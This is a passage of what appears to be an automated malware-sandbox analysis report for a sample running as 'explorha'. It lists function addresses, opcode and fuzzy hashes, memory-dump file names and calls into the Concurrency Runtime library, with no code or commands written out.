                                                                                                      • Instruction Fuzzy Hash: 01F0AD31A00904ABC601BB7C9D17B0E7BB4FB12760F800258E825AB2D1DA35990487D3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 049F0CDA Relevance: .1, Instructions: 52COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3044700198.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_49f0000_explorha.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cf521dbad8e17fb8351d090990cb9ad7640762bc2bcecea9c64ec58fc9461261
                                                                                                      • Instruction ID: 435a73a69729bff070d9d148830e7bee2d722c013844bec28bca900f9bb5d98e
                                                                                                      • Opcode Fuzzy Hash: cf521dbad8e17fb8351d090990cb9ad7640762bc2bcecea9c64ec58fc9461261
                                                                                                      • Instruction Fuzzy Hash: DBF0E19774A211EE9302417949901F97B9F6A970307340877E107CB647E55065167332
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 049F0CB3 Relevance: .0, Instructions: 46COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3044700198.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_49f0000_explorha.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a321c683fbf43e819aa4b56f8154842f211460367305074b95fd5d4cefe65cc6
                                                                                                      • Instruction ID: f27bfbd895af6afc66504cd81c035dfce5939ab0e0b9d4ff0e5f26172f37b6f3
                                                                                                      • Opcode Fuzzy Hash: a321c683fbf43e819aa4b56f8154842f211460367305074b95fd5d4cefe65cc6
                                                                                                      • Instruction Fuzzy Hash: 42F024A3309200BE4202859859804B57BAFA6972717304C31B207CB207F5A47A12B331
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 049F0CAE Relevance: .0, Instructions: 40COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3044700198.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_49f0000_explorha.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0dbe1cf6a040cc73e745abeff89c6ff8cb25fd12d0b31adf117b68029733e75a
                                                                                                      • Instruction ID: cd64784293cd4baf630cee529ac977dc2c7d8f923082a6f3d7735fb944e6ac86
                                                                                                      • Opcode Fuzzy Hash: 0dbe1cf6a040cc73e745abeff89c6ff8cb25fd12d0b31adf117b68029733e75a
                                                                                                      • Instruction Fuzzy Hash: 82F0E5A730A205FE520285989E00576BBAFA69B270B308C32F207CB247F5A03D51B331
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 049F0CCA Relevance: .0, Instructions: 40COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3044700198.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_49f0000_explorha.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 934b2693bcdaa3006c23cabeb816c52b9288001807d8f9b7c2293df6890d66a0
                                                                                                      • Instruction ID: bd7f8dfe9b84d6fdb908db1cfb59b5b0f6af5eb74312afd1281afd56c4abadb3
                                                                                                      • Opcode Fuzzy Hash: 934b2693bcdaa3006c23cabeb816c52b9288001807d8f9b7c2293df6890d66a0
                                                                                                      • Instruction Fuzzy Hash: 1FF0E5AB30D200FE520295D469005B5ABAFAA976713304C76F207CB607F5A43951B331
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 049F0D1B Relevance: .0, Instructions: 31COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3044700198.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_49f0000_explorha.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ed422821b1d3afdbf0404afc8cf1a9e9b5967ff0eb308e366389f1bbb48ca862
                                                                                                      • Instruction ID: 1403ba2e6f7e685ac8c7b70d0279661ad55778a2b07cd3e276feef88c9249487
                                                                                                      • Opcode Fuzzy Hash: ed422821b1d3afdbf0404afc8cf1a9e9b5967ff0eb308e366389f1bbb48ca862
                                                                                                      • Instruction Fuzzy Hash: EBE026CB3541107CA14785D956048B5EA6FA7A733473485726142C6983E5D82AA82331
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Non-executed Functions

                                                                                                      Function 008824A3 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 008825A6
                                                                                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 008825F2
                                                                                                        • Part of subcall function 00883CED: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00883DE0
                                                                                                      • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 0088265E
                                                                                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0088267A
                                                                                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 008826CE
                                                                                                      • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 008826FB
                                                                                                      • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00882751
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                                                                      • String ID: (
                                                                                                      • API String ID: 2943730970-3887548279
                                                                                                      • Opcode ID: abd26d59c194d9d2eb213d3fdaff377cb3024cf118292cc080b73f1a2cfe9592
                                                                                                      • Instruction ID: 8a4fe2a5ff21edcb22489ad587e97327b05032d8d762897f8574fbfa7c7e82aa
                                                                                                      • Opcode Fuzzy Hash: abd26d59c194d9d2eb213d3fdaff377cb3024cf118292cc080b73f1a2cfe9592
                                                                                                      • Instruction Fuzzy Hash: 33B15B70A00615EFDB19EF59D980A7EB7B5FB48300F14856DE806EB641D730AE41CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00882C92 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0088438C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 0088439F
                                                                                                      • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00882CA4
                                                                                                        • Part of subcall function 0088449F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 008844C9
                                                                                                        • Part of subcall function 0088449F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00884538
                                                                                                      • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00882DD6
                                                                                                      • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00882E36
                                                                                                      • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00882E42
                                                                                                      • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00882E7D
                                                                                                      • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00882E9E
                                                                                                      • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00882EAA
                                                                                                      • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00882EB3
                                                                                                      • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00882ECB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                      • String ID:
                                                                                                      • API String ID: 2508902052-0
                                                                                                      • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                      • Instruction ID: 87e4844398d5221a33fd7fda2d539b6adad52d239c1c8445efa1fd3ac71a15b8
                                                                                                      • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                      • Instruction Fuzzy Hash: 03815D71E006299FCB18EFA8C584A6DBBF2FF48304B1546ADD845EB706C770AD52CB94
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008902D8 Relevance: 6.1, APIs: 4, Instructions: 139COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00890311
                                                                                                        • Part of subcall function 0088A5BF: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0088A5E0
                                                                                                      • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00890377
                                                                                                      • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0089038F
                                                                                                      • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0089039C
                                                                                                        • Part of subcall function 0088FE3F: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0088FE67
                                                                                                        • Part of subcall function 0088FE3F: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0088FEFF
                                                                                                        • Part of subcall function 0088FE3F: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0088FF09
                                                                                                        • Part of subcall function 0088FE3F: Concurrency::location::_Assign.LIBCMT ref: 0088FF3D
                                                                                                        • Part of subcall function 0088FE3F: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0088FF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                                                      • String ID:
                                                                                                      • API String ID: 2363638799-0
                                                                                                      • Opcode ID: ce4a94cec0fbe43f33c9064a09becc2de2cc03ae9a9581fc80a8d42be792b349
                                                                                                      • Instruction ID: 0e21190837cc70d94cb4a478eb124e6012ee1e5ba0e10ded7d2d4a908abb01d3
                                                                                                      • Opcode Fuzzy Hash: ce4a94cec0fbe43f33c9064a09becc2de2cc03ae9a9581fc80a8d42be792b349
                                                                                                      • Instruction Fuzzy Hash: 71516E31A002059FCF18EF54C895BAEB775FF44714F1841A9A906AB392CB71AE05DFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0087E227 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtFlushProcessWriteBuffers.NTDLL ref: 0087E23A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
